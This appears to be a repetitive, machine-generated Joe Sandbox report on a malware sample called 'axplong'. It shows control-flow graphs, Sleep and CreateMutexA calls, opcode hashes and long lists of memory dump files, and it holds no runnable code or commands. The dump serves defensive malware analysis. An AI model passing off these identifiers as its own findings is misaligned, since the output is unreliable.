                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 6db99bb820f5d1e282b2533145cbab7a22bbe8eae8ccb3c6ede98a4c4f632233
                                                                                                                                                                                                        • Instruction ID: 70082a647f8499d41cee82c0eeb2daf81790910cb9ddce115029d9334de7622d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6db99bb820f5d1e282b2533145cbab7a22bbe8eae8ccb3c6ede98a4c4f632233
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43314831B001008BEF0CDBBCDD8876DB763AF86314F20465CE0959B7E6D77989819792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 202 63a5b2-63a5d2 206 63a600-63a61c 202->206 207 63a5d4-63a5e0 202->207 210 63a64a-63a669 206->210 211 63a61e-63a62a 206->211 208 63a5e2-63a5f0 207->208 209 63a5f6-63a5fd call 64d593 207->209 208->209 214 63a879-63a87e call 666b9a 208->214 209->206 212 63a697-63a846 call 647f30 210->212 213 63a66b-63a677 210->213 216 63a640-63a647 call 64d593 211->216 217 63a62c-63a63a 211->217 218 63a679-63a687 213->218 219 63a68d-63a694 call 64d593 213->219 230 63a883-63a8c4 Sleep CreateMutexA 214->230 231 63a87e call 666b9a 214->231 216->210 217->214 217->216 218->214 218->219 219->212 234 63a8d7-63a8d8 230->234 235 63a8c6-63a8c8 230->235 231->230 235->234 236 63a8ca-63a8d5 235->236 236->234
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: f0f8fa5f14c5a06959b6da36b3369a6daf634053243d11301870ef7168f5b6fa
                                                                                                                                                                                                        • Instruction ID: 476107ec74f777a03b8b2b5eb5e9998d8d29700c92ddcb6d47093c3450482bdf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0f8fa5f14c5a06959b6da36b3369a6daf634053243d11301870ef7168f5b6fa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27316671B00140DBEF0CDBB8DC897ADB763AF86310F24866CE0509B7E5C73989819792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 238 639a0c-639a18 239 639a1a-639a28 238->239 240 639a2e-639cc1 call 64d593 call 647870 call 635b20 call 638a60 call 648150 call 647870 call 635b20 call 638a60 call 648150 238->240 239->240 241 63a847 239->241 243 63a883-63a8c4 Sleep CreateMutexA 241->243 244 63a847 call 666b9a 241->244 250 63a8d7-63a8d8 243->250 251 63a8c6-63a8c8 243->251 244->243 251->250 253 63a8ca-63a8d5 251->253 253->250
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 7bf69285bf76868176c141219b7e771a1602aac89d944de2d91e0ca67f2f0f30
                                                                                                                                                                                                        • Instruction ID: 652e9f2cc6faddc95b913ca78f60ab3dfc0fcf60e0b9ac3a7ee4795faa2abb26
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bf69285bf76868176c141219b7e771a1602aac89d944de2d91e0ca67f2f0f30
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 672176717142009BEB1C9B68EC8976DB767EFC6310F20432DE4548BBE5DB7589828792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 283 63a27f-63a28b 284 63a2a1-63a2ca call 64d593 283->284 285 63a28d-63a29b 283->285 291 63a2f8-63a846 call 647f30 284->291 292 63a2cc-63a2d8 284->292 285->284 286 63a86a 285->286 289 63a883-63a8c4 Sleep CreateMutexA 286->289 290 63a86a call 666b9a 286->290 299 63a8d7-63a8d8 289->299 300 63a8c6-63a8c8 289->300 290->289 293 63a2da-63a2e8 292->293 294 63a2ee-63a2f5 call 64d593 292->294 293->286 293->294 294->291 300->299 303 63a8ca-63a8d5 300->303 303->299
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: a282781b700f0de49f719b5809eb82550504ff6c4b4da3b1c58166dc434f8c72
                                                                                                                                                                                                        • Instruction ID: 263ab7cc99a1008f73719dacfa58ce1bbd9deea71a64665f518b2b4a8edde47a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a282781b700f0de49f719b5809eb82550504ff6c4b4da3b1c58166dc434f8c72
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A217C317102019BEB1CDBA8DC8876DB763EFC5310F24022DE445DB7E5CB3556819392

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 306 63a786-63a79e 307 63a7a0-63a7ac 306->307 308 63a7cc-63a7ce 306->308 311 63a7c2-63a7c9 call 64d593 307->311 312 63a7ae-63a7bc 307->312 309 63a7d0-63a7d7 308->309 310 63a7d9-63a7e1 call 637d00 308->310 314 63a81b-63a846 call 647f30 309->314 322 63a7e3-63a7eb call 637d00 310->322 323 63a814-63a816 310->323 311->308 312->311 316 63a87e 312->316 320 63a883-63a8b7 Sleep CreateMutexA 316->320 321 63a87e call 666b9a 316->321 326 63a8be-63a8c4 320->326 321->320 322->323 330 63a7ed-63a7f5 call 637d00 322->330 323->314 328 63a8d7-63a8d8 326->328 329 63a8c6-63a8c8 326->329 329->328 331 63a8ca-63a8d5 329->331 330->323 335 63a7f7-63a7ff call 637d00 330->335 331->328 335->323 338 63a801-63a809 call 637d00 335->338 338->323 341 63a80b-63a812 338->341 341->314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
